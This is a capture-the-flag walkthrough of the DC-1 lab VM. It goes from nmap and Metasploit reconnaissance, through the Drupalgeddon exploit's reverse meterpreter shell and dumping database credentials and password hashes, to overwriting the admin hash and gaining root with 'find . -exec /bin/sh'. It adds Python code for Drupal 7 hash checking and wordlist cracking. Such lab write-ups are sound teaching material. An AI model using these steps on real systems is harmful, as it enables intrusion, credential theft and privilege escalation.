Environment: Kali 2018 and the DC-1 target VM, both running on VMware.
Discover hosts on the LAN with nmap
Shell command
nmap -sn 192.168.12.0/24
Shell output
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 10:27 CST
Nmap scan report for 192.168.12.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:00 (VMware)
Nmap scan report for 192.168.12.129
Host is up (0.00026s latency).
MAC Address: 00:0C:29:BF:AE:30 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:F0:BC:D6 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.95 seconds
Four live hosts were found. 192.168.12.1 is the physical host and 192.168.12.128 is this Kali machine (192.168.12.254, with a VMware OUI, is typically VMware's own DHCP/NAT service). Browsing to the remaining address confirms that 192.168.12.129 is the DC-1 target. The footer of its front page reads "Powered by Drupal", so the site is built on the Drupal CMS. Beyond that the page offers nothing else worth using.
Next, scan all ports on 192.168.12.129; the result is as follows:
Shell command
root@kali:~# nmap -p- -A -v 192.168.12.129
Shell output
Nmap scan report for 192.168.12.129
Host is up (0.00047s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41785/udp status
|_ 100024 1 56404/tcp status
56404/tcp open status 1 (RPC #100024)
The scan shows four open TCP ports: SSH (22), HTTP (80), rpcbind (111) and an RPC status service (56404). nmap's HTTP scripts also found a robots.txt on port 80, so we fetch it directly. It lists a number of installation, upgrade and licence files:
File: robots.txt (excerpt)
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
After reading several of these, UPGRADE.txt carries version information from which we infer Drupal 7 (nmap's http-generator line already said as much; CHANGELOG.txt, when readable, gives the exact point release, which is what decides whether a known core exploit applies). Nothing else of value turned up.
robots.txt gave too little, so we try the directory scanner in msfconsole against the site.
Shell command
root@kali:~# msfconsole
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.12.129 # target host address
msf5 auxiliary(scanner/http/dir_scanner) > set THREADS 20 # number of concurrent threads
msf5 auxiliary(scanner/http/dir_scanner) > show options
msf5 auxiliary(scanner/http/dir_scanner) > run # start the scan
Shell output
Module options (auxiliary/scanner/http/dir_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt no Path of word dictionary to use
PATH / yes The path to identify files
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.12.129 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 20 yes The number of concurrent threads
VHOST no HTTP server virtual host
[*] Detecting error code
[*] Using code '404' as not found for 192.168.12.129
[+] Found http://192.168.12.129:80/.CVS/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/.../ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/0/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/Admin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/USER/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/admin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/batch/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/cgi-bin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/icons/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/includes/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/misc/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/modules/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/node/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/profiles/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/scripts/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/search/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/sites/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/themes/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/user/ 200 (192.168.12.129)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Unfortunately most of the discovered paths return 403, and the few 200s (Drupal's own /user login page and /node listing) offer nothing useful. Next, see what Metasploit has for Drupal:
Shell command
msf5 > search drupal
Shell output
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Try these modules one by one. The first, auxiliary/gather/drupal_openid_xxe, is an OpenID external entity injection; it did not work. The second, auxiliary/scanner/http/drupal_views_user_enum, is a user-enumeration scanner; it did not work either. The third, exploit/multi/http/drupal_drupageddon, is a SQL injection exploit (Drupalgeddon, SA-CORE-2014-005 / CVE-2014-3704, affecting Drupal 7 before 7.32).
Shell command
msf5 > use exploit/multi/http/drupal_drupageddon
msf5 exploit(multi/http/drupal_drupageddon) > set RHOSTS 192.168.12.129
msf5 exploit(multi/http/drupal_drupageddon) > run
Shell output
RHOSTS => 192.168.12.129
[*] Started reverse TCP handler on 192.168.12.128:4444
[*] Sending stage (38247 bytes) to 192.168.12.129
[*] Meterpreter session 1 opened (192.168.12.128:4444 -> 192.168.12.129:59507) at 2019-07-15 11:17:35 +0800
meterpreter >
It worked. Running ls in the session shows a flag1.txt in the directory we landed in (the web root); cat it.
Shell command
meterpreter > ls
meterpreter > cat flag1.txt
Shell output (excerpt)
Every good CMS needs a config file - and so do you.
First hint: go and find Drupal's configuration file. A quick search shows that Drupal 7's configuration file lives by default at sites/default/settings.php under the site root, i.e. the directory containing flag1.txt.
Shell command
meterpreter > cd sites/default/
meterpreter > cat settings.php
Shell output (excerpt)
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
This gives flag2 and a username and password for the local MySQL server, so the next step is to look inside the database for anything useful.
Typing mysql -udbuser -p at the meterpreter prompt is rejected as an invalid command; typing shell and pressing Enter switches to a system shell on the target, and there mysql -udbuser -p plus the password opens the MySQL client. One snag: without a proper TTY the terminal does not echo correctly. Even so, dumping the users table yields the usernames and password hashes (Drupal stores a salted hash, not an encrypted password).
MySQL console output (select * from users\G)
*************************** 1. row ***************************
uid: 0
name:
pass:
mail:
theme:
signature:
signature_format: NULL
created: 0
access: 0
login: 0
status: 0
timezone: NULL
language:
picture: 0
init:
data: NULL
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: fred@example.org
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: fred@example.org
data: b:0;
Reversing these hashes is hard: the $S$ prefix marks Drupal 7's own scheme, a salted SHA-512 iterated 2^15 times by default, so cracking is slow. Turn the problem around instead: hash a password of our own choosing and write the result into the database. That needs the exact hashing algorithm. One could guess common algorithms one at a time, but that is unreliable: whoever built the CMS knows the common ones too, may chain several, and may have added a variant of their own. The Drupal documentation at https://www.drupal.org/node/1023428 points to the bundled script scripts/password-hash.sh, which produces a hash in the site's own format, so we use that directly.
Shell command
php ./scripts/password-hash.sh 123456
Shell output
password: 123456 hash: $S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu
The script has to be run from the Drupal root (the directory containing flag1.txt and sites/), not from inside scripts/; run from inside it errors out. Reading the script shows why: it defines DRUPAL_ROOT as the current working directory and includes includes/password.inc and includes/bootstrap.inc relative to that, so from scripts/ those files cannot be found.
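To see exactly what password-hash.sh computes, here is the Drupal 7 scheme reimplemented in Python. This is an added example, not code from the write-up above nor Drupal's own includes/password.inc, though it follows that file's algorithm; the function names (hash_password, check_password, guess_from_wordlist) are my own, and HASH_FROM_SCRIPT is the hash the script printed for 123456 above. With it you can verify a dumped hash offline, run a wordlist against the admin and Fred hashes from the users table (the page does not show the outcome of that, so none is claimed here), or mint a replacement hash without touching PHP on the target:

```python
"""Drupal 7 password hashing ($S$ scheme), reimplemented in Python.

Added example, not Drupal's own code. Format: '$S$' + count char + 8-char salt
+ phpass-base64(SHA-512 digest), truncated to 55 chars. The digest is
sha512(salt + pw) followed by 2**count_log2 rounds of sha512(digest + pw).
"""
import hashlib
import hmac
import math
import os
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are cut to this
DEFAULT_COUNT_LOG2 = 15     # DRUPAL_HASH_COUNT: 2**15 = 32768 SHA-512 rounds
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30

# Hash printed on the page by: php ./scripts/password-hash.sh 123456
HASH_FROM_SCRIPT = "$S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu"


def _base64_encode(data: bytes) -> str:
    """phpass base64: 6-bit groups, little-endian, ITOA64 alphabet (not RFC 4648)."""
    out, i, count = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def _crypt(algo: str, password: str, setting: str) -> Optional[str]:
    """Port of _password_crypt(): the 12-char setting is '$S$' + count char + salt."""
    if len(password) > 512:            # Drupal refuses huge passwords (DoS guard)
        return None
    setting = setting[:12]
    if len(setting) < 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return None
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.new(algo, salt + pw).digest()
    for _ in range(1 << count_log2):    # iterated, password re-appended each round
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting + _base64_encode(digest)
    expected = 12 + math.ceil(8 * len(digest) / 6)
    return output[:HASH_LENGTH] if len(output) == expected else None


def hash_password(password: str, count_log2: int = DEFAULT_COUNT_LOG2,
                  salt: Optional[bytes] = None) -> str:
    """Equivalent of user_hash_password(); fresh random 6-byte salt unless given."""
    salt = os.urandom(6) if salt is None else salt
    setting = "$S$" + ITOA64[count_log2] + _base64_encode(salt)
    result = _crypt("sha512", password, setting)
    if result is None:
        raise ValueError("could not hash password (bad count_log2 or salt)")
    return result


def check_password(password: str, stored_hash: str) -> bool:
    """Equivalent of user_check_password(); handles 'U$' (Drupal 6) and phpass md5 too."""
    if stored_hash.startswith("U$"):    # md5 hash migrated from Drupal 6, re-hashed
        stored_hash = stored_hash[1:]
        password = hashlib.md5(password.encode()).hexdigest()
    kind = stored_hash[:3]
    if kind == "$S$":
        computed = _crypt("sha512", password, stored_hash)
    elif kind in ("$H$", "$P$"):
        computed = _crypt("md5", password, stored_hash)
    else:
        return False
    return computed is not None and hmac.compare_digest(computed, stored_hash)


def guess_from_wordlist(stored_hash: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary check against a dumped hash; the matching word or None."""
    for word in candidates:
        if check_password(word, stored_hash):
            return word
    return None


if __name__ == "__main__":
    print("123456 matches the page's hash:", check_password("123456", HASH_FROM_SCRIPT))
    print("fresh hash for 123456:", hash_password("123456"))
```

The round count is encoded in the fourth character (D is index 15, so 2^15 rounds), which is why a hash from one Drupal 7 site verifies with the same code even if that site raised password_count_log2. The 55-character truncation is Drupal's own; the comparison is over the truncated string, so the last few base64 characters of the digest never matter.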
With the hash in hand, write it into the users table. When I entered the UPDATE as a single line it kept erroring, and in the end I got it in by entering the statement in pieces. One likely cause is quoting: in MySQL, backticks quote identifiers (table and column names), not string values, so the hash must be wrapped in single quotes as below. Note also that \G already terminates a query, so a trailing ; after it produces "No query specified".
MySQL console commands
mysql -udbuser -pR0ck3t
use drupaldb
update users set pass='$S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu' where uid=1;
select * from users\G
MySQL console output (excerpt)
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
Log in as admin with the password we set (123456). On the Content page there is a node titled flag3;
open it:
flag3 content
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
The hint says special permissions will help find the password, and mentions the shadow file. The capitalised words are the real pointer: PERMS and FIND suggest a find binary carrying a special permission bit (setuid), and -exec is find's option for running a command. First, though, look at /etc/passwd, since "shadow" refers to /etc/shadow, where the password hashes live:
Shell command
cat /etc/passwd
Shell output
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
The last entry points straight at a flag4 account with home directory /home/flag4; have a look.
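A small triage of the /etc/passwd listing above, as an added example (not part of the original write-up): it parses the seven-field format, flags accounts that both have a login shell and fall in the human UID range (root, and 1000 and up by Debian convention), and reports any account whose password field holds a hash or is empty instead of the usual x that defers to /etc/shadow. The class and function names are mine. On this box many system accounts still have /bin/sh, so the shell alone would be a poor filter; the sample is the listing above embedded as a string so the script runs offline:

```python
"""Triage /etc/passwd after a foothold: which accounts are worth chasing?

Added example, not part of the original write-up. SAMPLE is the /etc/passwd
listing from the DC-1 box, embedded so this runs offline; on a live host use
parse_passwd(open("/etc/passwd").read()) instead.
"""
from dataclasses import dataclass
from typing import List

# Shells that do not give an interactive login.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
# Debian's default range for ordinary (human) users; 0 is root.
HUMAN_UID_MIN, HUMAN_UID_MAX = 1000, 60000


@dataclass
class PasswdEntry:
    name: str
    passwd: str   # 'x' means the real hash is in /etc/shadow
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def has_login_shell(self) -> bool:
        return self.shell not in NOLOGIN_SHELLS

    @property
    def is_human(self) -> bool:
        return self.uid == 0 or HUMAN_UID_MIN <= self.uid < HUMAN_UID_MAX


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines; raise on malformed lines rather than guessing."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def interesting_accounts(entries: List[PasswdEntry]) -> List[PasswdEntry]:
    """Human accounts that can log in: their home dirs and shadow hashes are the targets."""
    return [e for e in entries if e.is_human and e.has_login_shell]


def exposed_passwd_fields(entries: List[PasswdEntry]) -> List[PasswdEntry]:
    """Accounts with no password at all, or with the hash kept in world-readable /etc/passwd."""
    return [e for e in entries if e.passwd not in ("x", "*", "!", "!!")]


# Constructed sample: the DC-1 /etc/passwd shown above.
SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
"""

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE)
    for e in interesting_accounts(entries):
        print(f"{e.name:10} uid={e.uid:<6} home={e.home:<14} shell={e.shell}")
    for e in exposed_passwd_fields(entries):
        print(f"WARNING: {e.name} has password field {e.passwd!r} in /etc/passwd")
```

On the DC-1 listing this reports exactly root and flag4, which is the same conclusion the hint led to, but the filter is reusable on any Debian-style host.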
Shell command
cd /home/flag4
ls
cat flag4.txt
Shell output (contents of flag4.txt)
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
This tells us to escalate privileges. Following flag3's hint, find is the candidate: if the find binary is setuid root (owned by root with the setuid bit set, which ls -l on the binary confirms), whatever it launches through -exec runs with root as the effective user. It does not matter what we search for; the -exec is what matters:
Shell command
find . -exec /bin/sh \;
whoami
cd /root
ls
cat thefinalflag.txt
Shell output
root
thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
Root and the final flag obtained; game over.
A few key points:
1. The initial shell comes from the exploit/multi/http/drupal_drupageddon module in msfconsole; for this box there is no need to dig into how it obtains the shell and connects back (it is the Drupalgeddon SQL injection, SA-CORE-2014-005 / CVE-2014-3704, in Drupal 7's database API, fixed in 7.32).
2. Privilege escalation is find with the -exec option. The shell spawned has to be /bin/sh; with /bin/bash and other shells the shell obtained was not root. The reason is that bash, when started with an effective UID different from the real UID, resets the effective UID to the real one unless invoked with -p, whereas /bin/sh on Debian is dash, which keeps the elevated effective UID it inherits from the setuid find.
3. After drupal_drupageddon opens a session and you type shell, the prompt may not appear or output may not echo properly. Spawning a pseudo-terminal from python fixes this (no root needed):
python -c 'import pty;pty.spawn("/bin/sh")'